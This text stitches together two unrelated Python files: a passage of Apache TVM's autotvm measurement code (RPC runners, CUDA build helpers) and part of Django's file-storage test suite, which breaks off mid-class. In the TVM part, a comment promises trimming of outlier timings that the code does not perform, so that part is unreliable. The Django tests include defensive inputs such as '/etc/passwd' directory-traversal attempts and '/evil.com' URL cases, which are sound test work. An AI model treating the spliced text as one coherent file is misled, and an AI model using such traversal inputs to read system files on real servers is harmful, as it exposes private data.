                                           self.min_repeat_ms,
                                           self.cooldown_interval,
                                           remote_args,
                                           self.ref_input,
                                           self.ref_output)
                futures.append(ret)

            for future in futures:
                res = future.get()
                if isinstance(res, Exception):   # executor error or timeout
                    results.append(MeasureResult((str(res),), MeasureErrorNo.RUN_TIMEOUT,
                                                 self.timeout, time.time()))
                else:
                    results.append(res)

        return results
class LocalRunner(RPCRunner):
    """Run generated code on local devices.

    Parameters
    ----------
    timeout: float
        The timeout of a compilation
    number: int
        The number of times to run the generated code for taking average.
        We call these runs as one `repeat` of measurement.
    repeat : int, optional
        The number of times to repeat the measurement.
        In total, the generated code will be run (1 + number x repeat) times,
        where the first one is warm up and will be discarded.
        The returned result contains `repeat` costs,
        each of which is an average of `number` costs.
    min_repeat_ms: int, optional
        The minimum duration of one `repeat` in milliseconds.
        By default, one `repeat` contains `number` runs. If this parameter is set,
        the parameters `number` will be dynamically adjusted to meet the
        minimum duration requirement of one `repeat`.
        i.e., When the run time of one `repeat` falls below this time, the `number` parameter
        will be automatically increased.
    cooldown_interval: float, optional
        The cool down interval between two measurements.
    check_correctness: bool, optional
        Whether check correctness after measurement. This will use llvm cpu target to
        call your template and get the reference output.
        This can work for TOPI templates, but may not work for your custom template.

    Note
    ----
    This is a "fake" local mode. We start a silent rpc tracker and rpc server
    for the user. In this way we reuse timeout/isolation mechanism in RPC infrastructure.
    """
    def __init__(self,
                 timeout=10,
                 number=4, repeat=3, min_repeat_ms=0, cooldown_interval=0.1,
                 check_correctness=False):
        # key/host/port are filled in later by set_task once the local
        # tracker and server are up; n_parallel is forced to 1
        super(LocalRunner, self).__init__('', None, None, 0,
                                          timeout=timeout, n_parallel=1,
                                          number=number, repeat=repeat,
                                          min_repeat_ms=min_repeat_ms,
                                          cooldown_interval=cooldown_interval,
                                          check_correctness=check_correctness)
        self.tracker = None
        self.server = None

    def set_task(self, task):
        """Start a silent local RPC tracker + server pair, register this
        runner against them, then delegate to RPCRunner.set_task.

        Returns the (server, tracker) pair so the caller can keep them
        alive / terminate them.
        """
        # pylint: disable=import-outside-toplevel
        from ...rpc.tracker import Tracker
        from ...rpc.server import Server

        self.task = task
        tracker = Tracker('0.0.0.0', port=9000, port_end=10000, silent=True)
        # Unique device key derived from the port the tracker bound to
        device_key = '$local$device$%d' % tracker.port
        server = Server('0.0.0.0', port=9000, port_end=10000,
                        key=device_key,
                        use_popen=True, silent=True,
                        tracker_addr=(tracker.host, tracker.port))
        self.key = device_key
        self.host = tracker.host
        self.port = tracker.port

        super(LocalRunner, self).set_task(task)
        return server, tracker
def _build_func_common(measure_input, check_gpu=None, cuda_arch=None, build_option=None):
    """Common part for building a configuration.

    Parameters
    ----------
    measure_input : MeasureInput
        Unpacked as (target, task, config).
    check_gpu : dict, optional
        GPU limits; when given, a verify pass is added to filter out
        invalid configs before running them.
    cuda_arch : str, optional
        CUDA architecture string (e.g. "sm_70") to set as target arch.
    build_option : dict, optional
        Extra PassContext config options.

    Returns
    -------
    (module, arg_info) : the built function and a tuple of
        (shape, dtype) pairs for its tensor arguments.
    """
    target, task, config = measure_input
    with target:
        s, args = task.instantiate(config)

        # check invalidity of template and code hash consistency
        if not config.valid():
            raise InstantiationError(config.errors)

        opts = build_option or {}
        if check_gpu:  # Add verify pass to filter out invalid configs in advance.
            opts["tir.add_lower_pass"] = [(2, gpu_verify_pass(**check_gpu))]
        if cuda_arch:
            set_cuda_target_arch(cuda_arch)

        # if target is vta, we need to use vta build
        if hasattr(measure_input.target, 'device_name') and \
                measure_input.target.device_name == 'vta':
            # pylint: disable=import-outside-toplevel
            import vta
            func = vta.build(s, args, target_host=task.target_host)
        else:
            with tvm.ir.transform.PassContext(config=opts):
                func = build(s, args, target_host=task.target_host)
    return func, tuple((get_const_tuple(x.shape), x.dtype) for x in args)
def _wrap_build_func(build_func):
    """
    Wrap build_func to a function that can be used in measure.

    Parameters
    ----------
    build_func : The compilation function
        We expect fcompile to contain an attr "output_format"

    Returns
    -------
    wrapped_build_func : function
        The wrapped build function
    """
    if not hasattr(build_func, "output_format"):
        raise AttributeError("Expect build_func to have the attribute output_format.")
    output_format = build_func.output_format

    def _wrapped(measure_input, tmp_dir, **kwargs):
        """
        Compile one MeasureInput and export the library into *tmp_dir*.

        Parameters
        ----------
        measure_input: MeasureInput
            The input of measurement
        tmp_dir: str
            The path of temporary directory to export generated library
        """
        start = time.time()
        try:
            # Randomized file name avoids collisions between parallel builds
            lib_path = os.path.join(tmp_dir, "tmp_func_%0x.%s" % (
                getrandbits(64), output_format))
            # TODO(tvm-team) consider linline _build_func_common
            func, arg_info = _build_func_common(measure_input, **kwargs)
            func.export_library(lib_path, build_func)
        except Exception as err:  # pylint: disable=broad-except
            return BuildResult(None, None, err, time.time() - start)
        return BuildResult(lib_path, arg_info, None, time.time() - start)

    return _wrapped
def run_through_rpc(measure_input, build_result,
                    number, repeat, min_repeat_ms, cooldown_interval,
                    remote_args, ref_input=None, ref_output=None):
    """Run a generated library through rpc.

    Parameters
    ----------
    measure_input: MeasureInput
        The raw measure input
    build_result: BuildResult
        The result returned from Builder. This contains the path to the generated library.
    number: int
        The number of times to run the generated code for taking average.
        We call these runs as one `repeat` of measurement.
    repeat : int, optional
        The number of times to repeat the measurement.
        In total, the generated code will be run (1 + number x repeat) times,
        where the first one is warm up and will be discarded.
        The returned result contains `repeat` costs,
        each of which is an average of `number` costs.
    min_repeat_ms: int, optional
        The minimum duration of one `repeat` in milliseconds.
        By default, one `repeat` contains `number` runs. If this parameter is set,
        the parameters `number` will be dynamically adjusted to meet the
        minimum duration requirement of one `repeat`.
        i.e., When the run time of one `repeat` falls below this time, the `number` parameter
        will be automatically increased.
    cooldown_interval: float
        The cool down interval between two measurements
    remote_args: Tuple
        The argument for request_remote
    ref_input: List of np.ndarray
        The reference input used for checking correctness
    ref_output: List of np.ndarray
        The reference output used for checking correctness
    """
    # A failed build is already a MeasureResult -- pass it through unchanged
    if isinstance(build_result, MeasureResult):
        return build_result

    tic = time.time()
    errno = MeasureErrorNo.NO_ERROR
    try:
        # upload built module
        remote = request_remote(*remote_args)
        # Program the FPGA every single time when targeting VTA
        if hasattr(measure_input.target, 'device_name') and \
                measure_input.target.device_name == 'vta':
            # pylint: disable=import-outside-toplevel
            from vta import program_fpga, reconfig_runtime
            program_fpga(remote, None)
            reconfig_runtime(remote)
        remote.upload(build_result.filename)
        func = remote.load_module(os.path.split(build_result.filename)[1])
        ctx = remote.context(str(measure_input.target), 0)
        time_f = func.time_evaluator(
            func.entry_name, ctx, number=number, repeat=repeat, min_repeat_ms=min_repeat_ms)

        # set input
        if ref_input:
            args = [nd.array(x, ctx=ctx) for x in ref_input]
        else:
            # create empty arrays on the remote device and copy them once.
            # This can avoid some memory issues that make the measurement results unreliable.
            args = [nd.empty(x[0], dtype=x[1], ctx=ctx) for x in build_result.arg_info]
            args = [nd.array(x, ctx=ctx) for x in args]
            ctx.sync()

        costs = time_f(*args).results

        # clean up remote files
        # NOTE(review): remote.remove('') presumably clears the upload
        # temp directory -- confirm against the RPC server implementation
        remote.remove(build_result.filename)
        remote.remove(os.path.splitext(build_result.filename)[0] + '.so')
        remote.remove('')

        if len(costs) > 2:  # remove largest and smallest value to reduce variance
            costs = list(costs)
            costs.sort()
            # NOTE(review): trimming is currently disabled; only sorting happens
            #costs = tuple(costs[1:-1])

        # check correctness of output
        if ref_output:
            for expected, real in zip(ref_output, args):
                if not np.allclose(expected, real.asnumpy(), rtol=1e-4):
                    logger.warning("Wrong Answer!")
                    errno = MeasureErrorNo.WRONG_ANSWER
    except TVMError as exc:
        # Trim noisy backtrace/source dumps from the device error message
        msg = str(exc)
        if "Stack trace returned" in msg:
            msg = msg[:msg.index("Stack trace returned")]
        if "CUDA Source" in msg:
            msg = msg[:msg.index("CUDA Source")]
        costs = (RuntimeError(msg[:1024]),)
        errno = MeasureErrorNo.RUNTIME_DEVICE
    tstamp = time.time()
    time.sleep(cooldown_interval)
    return MeasureResult(costs, errno, tstamp - tic + build_result.time_cost, tstamp)
def request_remote(device_key, host=None, port=None, priority=1, timeout=60):
    """Request a remote session from the RPC tracker.

    Parameters
    ----------
    device_key: string
        The device key of registered device in tracker
    host: str, optional
        The host address of rpc tracker.
        If is none, will use environment variable "TVM_TRACKER_HOST"
    port: int, optional
        The port of rpc tracker.
        If is none, will use environment variable "TVM_TRACKER_PORT"
    priority: int, optional
        The priority of this request, larger is more prior
    timeout: float, optional
        The timeout of this session (units: second)

    Returns
    -------
    session: RPCSession

    Raises
    ------
    RuntimeError
        If no tracker address is given and the environment variables are unset.
    """
    # Resolve the tracker address, falling back to the environment. Fail with
    # a clear message instead of a bare KeyError when neither source has it.
    host = host or os.environ.get('TVM_TRACKER_HOST')
    port = port or os.environ.get('TVM_TRACKER_PORT')
    if host is None or port is None:
        raise RuntimeError(
            "Cannot find tracker address. Set the TVM_TRACKER_HOST and "
            "TVM_TRACKER_PORT environment variables or pass host/port explicitly.")
    # connect to the tracker
    tracker = _rpc.connect_tracker(host, int(port))
    remote = tracker.request(device_key, priority=priority,
                             session_timeout=timeout)
    return remote
def check_remote(target, device_key, host=None, port=None, priority=100, timeout=10):
    """
    Check the availability of a remote device

    Parameters
    ----------
    target: Target
        The wanted compilation target
    device_key: string
        device key of registered device in tracker
    host: host, optional
        The host address of rpc tracker.
        If is none, will use environment variable "TVM_TRACKER_HOST"
    port: int, optional
        The port address of rpc tracker.
        If is none, will use environment variable "TVM_TRACKER_PORT"
    priority: int, optional
        The priority of this request, larger is more prior
    timeout: float, optional
        The timeout of this check (units: seconds).

    Returns
    -------
    available: bool
        True if can find available device
    """
    def _check():
        remote = request_remote(device_key, host, port, priority)
        ctx = remote.context(str(target))
        while not ctx.exist:  # wait until we get an available device
            # Sleep instead of spinning so the poll does not burn a full core.
            time.sleep(0.1)

    # Run the check in a daemon thread: if the device never shows up, the
    # stuck thread must not keep the interpreter alive after join() times out.
    t = threading.Thread(target=_check)
    t.daemon = True
    t.start()
    t.join(timeout)
    # Thread still alive => the device did not become available in time.
    return not t.is_alive()
@tvm._ffi.register_func
def tvm_callback_cuda_compile(code):
    """use nvcc to generate ptx code for better optimization"""
    # The configured arch is either a single "-arch" value (compile to ptx)
    # or a list of "-gencode" flags, e.g.
    #   ["-gencode", "arch=compute_52,code=sm_52",
    #    "-gencode", "arch=compute_70,code=sm_70"]
    # in which case we produce a fatbin covering every listed architecture.
    arch = AutotvmGlobalScope.current.cuda_target_arch
    output_format = "fatbin" if isinstance(arch, list) else "ptx"
    return nvcc.compile_cuda(code, target=output_format,
                             arch=AutotvmGlobalScope.current.cuda_target_arch)
def set_cuda_target_arch(arch):
    """set target architecture of nvcc compiler

    Parameters
    ----------
    arch: str or list
        The argument of nvcc -arch. (e.g. "sm_51", "sm_62")
        it can also be a list of gencode arguments passed to the nvcc command line,
        e.g., ["-gencode", "arch=compute_52,code=sm_52", "-gencode", "arch=compute_70,code=sm_70"]
    """
    # Stored on the process-wide scope; read back by tvm_callback_cuda_compile.
    AutotvmGlobalScope.current.cuda_target_arch = arch
def gpu_verify_pass(**kwargs):
    """Verify the validity of a gpu kernel.
    This pass will check memory usage and number of threads per block.

    The keyword arguments are forwarded as the constraint dict to
    tvm.tir.analysis.verify_gpu_code (e.g. max_shared_memory_per_block).
    """
    def _verify(func, *_):
        # Abort instantiation of configs whose generated kernel breaks limits.
        if not tvm.tir.analysis.verify_gpu_code(func, kwargs):
            raise InstantiationError("Skipped because of invalid gpu kernel")
        return func

    return tvm.tir.transform.prim_func_pass(_verify, opt_level=0)
|
tests.py | import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from io import StringIO
from urllib.request import urlopen
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import timezone
from .models import Storage, temp_storage, temp_storage_location
# Regex fragment matching the 7 random alphanumeric characters the storage
# layer appends to de-duplicate file names (e.g. "name_a1B2c3D.txt").
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
    """Tests for django.core.files.storage.get_storage_class()."""

    def test_get_filesystem_storage(self):
        """
        get_storage_class returns the class for a storage backend name/path.
        """
        dotted_path = 'django.core.files.storage.FileSystemStorage'
        self.assertEqual(get_storage_class(dotted_path), FileSystemStorage)

    def test_get_invalid_storage_module(self):
        """
        get_storage_class raises an error if the requested import don't exist.
        """
        msg = "No module named 'storage'"
        with self.assertRaisesMessage(ImportError, msg):
            get_storage_class('storage.NonexistentStorage')

    def test_get_nonexistent_storage_class(self):
        """
        get_storage_class raises an error if the requested class don't exist.
        """
        with self.assertRaises(ImportError):
            get_storage_class('django.core.files.storage.NonexistentStorage')

    def test_get_nonexistent_storage_module(self):
        """
        get_storage_class raises an error if the requested module don't exist.
        """
        msg = "No module named 'django.core.files.nonexistent_storage'"
        with self.assertRaisesMessage(ImportError, msg):
            get_storage_class('django.core.files.nonexistent_storage.NonexistentStorage')
class FileSystemStorageTests(unittest.TestCase):
    """Construction-level behavior of FileSystemStorage itself."""

    def test_deconstruction(self):
        # Default construction deconstructs to the location-only form.
        path, args, kwargs = temp_storage.deconstruct()
        self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
        self.assertEqual(args, ())
        self.assertEqual(kwargs, {'location': temp_storage_location})

        # Explicit constructor kwargs round-trip through deconstruct().
        original_kwargs = {
            'location': temp_storage_location,
            'base_url': 'http://myfiles.example.com/'
        }
        storage = FileSystemStorage(**original_kwargs)
        path, args, kwargs = storage.deconstruct()
        self.assertEqual(kwargs, original_kwargs)

    def test_lazy_base_url_init(self):
        """
        FileSystemStorage.__init__() shouldn't evaluate base_url.
        """
        # The lazy URL only resolves (and fails) when url() is called.
        storage = FileSystemStorage(base_url=reverse_lazy('app:url'))
        with self.assertRaises(NoReverseMatch):
            storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
    """Behavioral tests for FileSystemStorage against a temp directory.

    Subclasses swap in another backend via ``storage_class``.
    """
    storage_class = FileSystemStorage

    def setUp(self):
        self.temp_dir = tempfile.mkdtemp()
        self.storage = self.storage_class(location=self.temp_dir, base_url='/test_media_url/')
        # Set up a second temporary directory which is ensured to have a mixed
        # case name.
        self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')

    def tearDown(self):
        shutil.rmtree(self.temp_dir)
        shutil.rmtree(self.temp_dir2)

    def test_empty_location(self):
        """
        An empty location falls back to the current working directory.
        """
        storage = self.storage_class(location='')
        self.assertEqual(storage.base_location, '')
        self.assertEqual(storage.location, os.getcwd())

    def test_file_access_options(self):
        """
        Standard file access options are available, and work as expected.
        """
        self.assertFalse(self.storage.exists('storage_test'))
        f = self.storage.open('storage_test', 'w')
        f.write('storage contents')
        f.close()
        self.assertTrue(self.storage.exists('storage_test'))

        f = self.storage.open('storage_test', 'r')
        self.assertEqual(f.read(), 'storage contents')
        f.close()

        self.storage.delete('storage_test')
        self.assertFalse(self.storage.exists('storage_test'))

    def _test_file_time_getter(self, getter):
        # Check for correct behavior under both USE_TZ=True and USE_TZ=False.
        # The tests are similar since they both set up a situation where the
        # system time zone, Django's TIME_ZONE, and UTC are distinct.
        self._test_file_time_getter_tz_handling_on(getter)
        self._test_file_time_getter_tz_handling_off(getter)

    @override_settings(USE_TZ=True, TIME_ZONE='Africa/Algiers')
    def _test_file_time_getter_tz_handling_on(self, getter):
        # Django's TZ (and hence the system TZ) is set to Africa/Algiers which
        # is UTC+1 and has no DST change. We can set the Django TZ to something
        # else so that UTC, Django's TIME_ZONE, and the system timezone are all
        # different.
        now_in_algiers = timezone.make_aware(datetime.now())

        with timezone.override(timezone.get_fixed_timezone(-300)):
            # At this point the system TZ is +1 and the Django TZ
            # is -5. The following will be aware in UTC.
            now = timezone.now()
            self.assertFalse(self.storage.exists('test.file.tz.on'))

            f = ContentFile('custom contents')
            f_name = self.storage.save('test.file.tz.on', f)
            self.addCleanup(self.storage.delete, f_name)
            dt = getter(f_name)
            # dt should be aware, in UTC
            self.assertTrue(timezone.is_aware(dt))
            self.assertEqual(now.tzname(), dt.tzname())

            # The three timezones are indeed distinct.
            naive_now = datetime.now()
            algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
            django_offset = timezone.get_current_timezone().utcoffset(naive_now)
            utc_offset = timezone.utc.utcoffset(naive_now)
            self.assertGreater(algiers_offset, utc_offset)
            self.assertLess(django_offset, utc_offset)

            # dt and now should be the same effective time.
            self.assertLess(abs(dt - now), timedelta(seconds=2))

    @override_settings(USE_TZ=False, TIME_ZONE='Africa/Algiers')
    def _test_file_time_getter_tz_handling_off(self, getter):
        # Django's TZ (and hence the system TZ) is set to Africa/Algiers which
        # is UTC+1 and has no DST change. We can set the Django TZ to something
        # else so that UTC, Django's TIME_ZONE, and the system timezone are all
        # different.
        now_in_algiers = timezone.make_aware(datetime.now())

        with timezone.override(timezone.get_fixed_timezone(-300)):
            # At this point the system TZ is +1 and the Django TZ
            # is -5.
            self.assertFalse(self.storage.exists('test.file.tz.off'))

            f = ContentFile('custom contents')
            f_name = self.storage.save('test.file.tz.off', f)
            self.addCleanup(self.storage.delete, f_name)
            dt = getter(f_name)
            # dt should be naive, in system (+1) TZ
            self.assertTrue(timezone.is_naive(dt))

            # The three timezones are indeed distinct.
            naive_now = datetime.now()
            algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
            django_offset = timezone.get_current_timezone().utcoffset(naive_now)
            utc_offset = timezone.utc.utcoffset(naive_now)
            self.assertGreater(algiers_offset, utc_offset)
            self.assertLess(django_offset, utc_offset)

            # dt and naive_now should be the same effective time.
            self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
            # If we convert dt to an aware object using the Algiers
            # timezone then it should be the same effective time to
            # now_in_algiers.
            _dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
            self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))

    def test_file_get_accessed_time(self):
        """
        File storage returns a Datetime object for the last accessed time of
        a file.
        """
        self.assertFalse(self.storage.exists('test.file'))

        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        self.addCleanup(self.storage.delete, f_name)
        atime = self.storage.get_accessed_time(f_name)

        self.assertEqual(atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(f_name))))
        self.assertLess(timezone.now() - self.storage.get_accessed_time(f_name), timedelta(seconds=2))

    @requires_tz_support
    def test_file_get_accessed_time_timezone(self):
        self._test_file_time_getter(self.storage.get_accessed_time)

    def test_file_get_created_time(self):
        """
        File storage returns a datetime for the creation time of a file.
        """
        self.assertFalse(self.storage.exists('test.file'))

        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        self.addCleanup(self.storage.delete, f_name)
        ctime = self.storage.get_created_time(f_name)

        self.assertEqual(ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(f_name))))
        self.assertLess(timezone.now() - self.storage.get_created_time(f_name), timedelta(seconds=2))

    @requires_tz_support
    def test_file_get_created_time_timezone(self):
        self._test_file_time_getter(self.storage.get_created_time)

    def test_file_get_modified_time(self):
        """
        File storage returns a datetime for the last modified time of a file.
        """
        self.assertFalse(self.storage.exists('test.file'))

        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        self.addCleanup(self.storage.delete, f_name)
        mtime = self.storage.get_modified_time(f_name)

        self.assertEqual(mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(f_name))))
        self.assertLess(timezone.now() - self.storage.get_modified_time(f_name), timedelta(seconds=2))

    @requires_tz_support
    def test_file_get_modified_time_timezone(self):
        self._test_file_time_getter(self.storage.get_modified_time)

    def test_file_save_without_name(self):
        """
        File storage extracts the filename from the content object if no
        name is given explicitly.
        """
        self.assertFalse(self.storage.exists('test.file'))

        f = ContentFile('custom contents')
        f.name = 'test.file'

        storage_f_name = self.storage.save(None, f)

        self.assertEqual(storage_f_name, f.name)

        self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))

        self.storage.delete(storage_f_name)

    def test_file_save_with_path(self):
        """
        Saving a pathname should create intermediate directories as necessary.
        """
        self.assertFalse(self.storage.exists('path/to'))
        self.storage.save('path/to/test.file', ContentFile('file saved with path'))

        self.assertTrue(self.storage.exists('path/to'))
        with self.storage.open('path/to/test.file') as f:
            self.assertEqual(f.read(), b'file saved with path')

        self.assertTrue(os.path.exists(
            os.path.join(self.temp_dir, 'path', 'to', 'test.file')))

        self.storage.delete('path/to/test.file')

    def test_save_doesnt_close(self):
        # Storage.save() must leave the caller's file object open; closing it
        # is the caller's responsibility.
        with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as file:
            file.write(b'1')
            file.seek(0)
            self.assertFalse(file.closed)
            self.storage.save('path/to/test.file', file)
            self.assertFalse(file.closed)
            self.assertFalse(file.file.closed)

        file = InMemoryUploadedFile(StringIO('1'), '', 'test', 'text/plain', 1, 'utf8')
        with file:
            self.assertFalse(file.closed)
            self.storage.save('path/to/test.file', file)
            self.assertFalse(file.closed)
            self.assertFalse(file.file.closed)

    def test_file_path(self):
        """
        File storage returns the full path of a file
        """
        self.assertFalse(self.storage.exists('test.file'))

        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)

        self.assertEqual(self.storage.path(f_name), os.path.join(self.temp_dir, f_name))

        self.storage.delete(f_name)

    def test_file_url(self):
        """
        File storage returns a url to access a given file from the Web.
        """
        self.assertEqual(self.storage.url('test.file'), self.storage.base_url + 'test.file')

        # should encode special chars except ~!*()'
        # like encodeURIComponent() JavaScript function do
        self.assertEqual(
            self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
            "/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file"
        )
        self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")

        # should translate os path separator(s) to the url path separator
        self.assertEqual(self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file")

        # #25905: remove leading slashes from file names to prevent unsafe url output
        self.assertEqual(self.storage.url("/evil.com"), "/test_media_url/evil.com")
        self.assertEqual(self.storage.url(r"\evil.com"), "/test_media_url/evil.com")
        self.assertEqual(self.storage.url("///evil.com"), "/test_media_url/evil.com")
        self.assertEqual(self.storage.url(r"\\\evil.com"), "/test_media_url/evil.com")

        self.assertEqual(self.storage.url(None), "/test_media_url/")

    def test_base_url(self):
        """
        File storage returns a url even when its base_url is unset or modified.
        """
        self.storage.base_url = None
        with self.assertRaises(ValueError):
            self.storage.url('test.file')

        # #22717: missing ending slash in base_url should be auto-corrected
        storage = self.storage_class(location=self.temp_dir, base_url='/no_ending_slash')
        self.assertEqual(
            storage.url('test.file'),
            '%s%s' % (storage.base_url, 'test.file')
        )

    def test_listdir(self):
        """
        File storage returns a tuple containing directories and files.
        """
        self.assertFalse(self.storage.exists('storage_test_1'))
        self.assertFalse(self.storage.exists('storage_test_2'))
        self.assertFalse(self.storage.exists('storage_dir_1'))

        self.storage.save('storage_test_1', ContentFile('custom content'))
        self.storage.save('storage_test_2', ContentFile('custom content'))
        os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))

        dirs, files = self.storage.listdir('')
        self.assertEqual(set(dirs), {'storage_dir_1'})
        self.assertEqual(set(files), {'storage_test_1', 'storage_test_2'})

        self.storage.delete('storage_test_1')
        self.storage.delete('storage_test_2')
        os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))

    def test_file_storage_prevents_directory_traversal(self):
        """
        File storage prevents directory traversal (files can only be accessed if
        they're below the storage location).
        """
        with self.assertRaises(SuspiciousFileOperation):
            self.storage.exists('..')
        with self.assertRaises(SuspiciousFileOperation):
            self.storage.exists('/etc/passwd')

    def test_file_storage_preserves_filename_case(self):
        """The storage backend should preserve case of filenames."""
        # Create a storage backend associated with the mixed case name
        # directory.
        other_temp_storage = self.storage_class(location=self.temp_dir2)
        # Ask that storage backend to store a file with a mixed case filename.
        mixed_case = 'CaSe_SeNsItIvE'
        file = other_temp_storage.open(mixed_case, 'w')
        file.write('storage contents')
        file.close()
        self.assertEqual(os.path.join(self.temp_dir2, mixed_case), other_temp_storage.path(mixed_case))
        other_temp_storage.delete(mixed_case)

    def test_makedirs_race_handling(self):
        """
        File storage should be robust against directory creation race conditions.
        """
        real_makedirs = os.makedirs

        # Monkey-patch os.makedirs, to simulate a normal call, a raced call,
        # and an error.
        def fake_makedirs(path, mode=0o777, exist_ok=False):
            if path == os.path.join(self.temp_dir, 'normal'):
                real_makedirs(path, mode, exist_ok)
            elif path == os.path.join(self.temp_dir, 'raced'):
                real_makedirs(path, mode, exist_ok)
                if not exist_ok:
                    raise FileExistsError()
            elif path == os.path.join(self.temp_dir, 'error'):
                raise PermissionError()
            else:
                self.fail('unexpected argument %r' % path)

        try:
            os.makedirs = fake_makedirs

            self.storage.save('normal/test.file', ContentFile('saved normally'))
            with self.storage.open('normal/test.file') as f:
                self.assertEqual(f.read(), b'saved normally')

            self.storage.save('raced/test.file', ContentFile('saved with race'))
            with self.storage.open('raced/test.file') as f:
                self.assertEqual(f.read(), b'saved with race')

            # Exceptions aside from FileExistsError are raised.
            with self.assertRaises(PermissionError):
                self.storage.save('error/test.file', ContentFile('not saved'))
        finally:
            os.makedirs = real_makedirs

    def test_remove_race_handling(self):
        """
        File storage should be robust against file removal race conditions.
        """
        real_remove = os.remove

        # Monkey-patch os.remove, to simulate a normal call, a raced call,
        # and an error.
        def fake_remove(path):
            if path == os.path.join(self.temp_dir, 'normal.file'):
                real_remove(path)
            elif path == os.path.join(self.temp_dir, 'raced.file'):
                real_remove(path)
                raise FileNotFoundError()
            elif path == os.path.join(self.temp_dir, 'error.file'):
                raise PermissionError()
            else:
                self.fail('unexpected argument %r' % path)

        try:
            os.remove = fake_remove

            self.storage.save('normal.file', ContentFile('delete normally'))
            self.storage.delete('normal.file')
            self.assertFalse(self.storage.exists('normal.file'))

            self.storage.save('raced.file', ContentFile('delete with race'))
            self.storage.delete('raced.file')
            # Was asserting 'normal.file' (already checked above); the raced
            # deletion is what this branch is meant to verify.
            self.assertFalse(self.storage.exists('raced.file'))

            # Exceptions aside from FileNotFoundError are raised.
            self.storage.save('error.file', ContentFile('delete with error'))
            with self.assertRaises(PermissionError):
                self.storage.delete('error.file')
        finally:
            os.remove = real_remove

    def test_file_chunks_error(self):
        """
        Test behavior when file.chunks() is raising an error
        """
        f1 = ContentFile('chunks fails')

        def failing_chunks():
            raise OSError
        f1.chunks = failing_chunks
        with self.assertRaises(OSError):
            self.storage.save('error.file', f1)

    def test_delete_no_name(self):
        """
        Calling delete with an empty name should not try to remove the base
        storage directory, but fail loudly (#20660).
        """
        with self.assertRaises(AssertionError):
            self.storage.delete('')

    def test_delete_deletes_directories(self):
        tmp_dir = tempfile.mkdtemp(dir=self.storage.location)
        self.storage.delete(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))

    @override_settings(
        MEDIA_ROOT='media_root',
        MEDIA_URL='media_url/',
        FILE_UPLOAD_PERMISSIONS=0o777,
        FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
    )
    def test_setting_changed(self):
        """
        Properties using settings values as defaults should be updated on
        referenced settings change while specified values should be unchanged.
        """
        storage = self.storage_class(
            location='explicit_location',
            base_url='explicit_base_url/',
            file_permissions_mode=0o666,
            directory_permissions_mode=0o666,
        )
        defaults_storage = self.storage_class()
        settings = {
            'MEDIA_ROOT': 'overridden_media_root',
            'MEDIA_URL': 'overridden_media_url/',
            'FILE_UPLOAD_PERMISSIONS': 0o333,
            'FILE_UPLOAD_DIRECTORY_PERMISSIONS': 0o333,
        }
        with self.settings(**settings):
            self.assertEqual(storage.base_location, 'explicit_location')
            self.assertIn('explicit_location', storage.location)
            self.assertEqual(storage.base_url, 'explicit_base_url/')
            self.assertEqual(storage.file_permissions_mode, 0o666)
            self.assertEqual(storage.directory_permissions_mode, 0o666)
            self.assertEqual(defaults_storage.base_location, settings['MEDIA_ROOT'])
            self.assertIn(settings['MEDIA_ROOT'], defaults_storage.location)
            self.assertEqual(defaults_storage.base_url, settings['MEDIA_URL'])
            self.assertEqual(defaults_storage.file_permissions_mode, settings['FILE_UPLOAD_PERMISSIONS'])
            self.assertEqual(
                defaults_storage.directory_permissions_mode, settings['FILE_UPLOAD_DIRECTORY_PERMISSIONS']
            )
class CustomStorage(FileSystemStorage):
    def get_available_name(self, name, max_length=None):
        """
        Append numbers to duplicate files rather than underscores, like Trac.
        """
        stem, *suffixes = name.split('.')
        candidate = name
        attempt = 2
        # Try "stem.2.ext", "stem.3.ext", ... until a free name turns up.
        while self.exists(candidate):
            candidate = '.'.join([stem, str(attempt)] + suffixes)
            attempt += 1
        return candidate
class CustomStorageTests(FileStorageTests):
    storage_class = CustomStorage

    def test_custom_get_available_name(self):
        # The second save of the same name should get ".2" appended rather
        # than the default random underscore suffix.
        saved_first = self.storage.save('custom_storage', ContentFile('custom contents'))
        self.assertEqual(saved_first, 'custom_storage')
        saved_second = self.storage.save('custom_storage', ContentFile('more contents'))
        self.assertEqual(saved_second, 'custom_storage.2')
        self.storage.delete(saved_first)
        self.storage.delete(saved_second)
class OverwritingStorage(FileSystemStorage):
    """
    Overwrite existing files instead of appending a suffix to generate an
    unused name.
    """
    # Mask out O_EXCL so os.open() doesn't raise OSError if the file exists.
    OS_OPEN_FLAGS = FileSystemStorage.OS_OPEN_FLAGS & ~os.O_EXCL

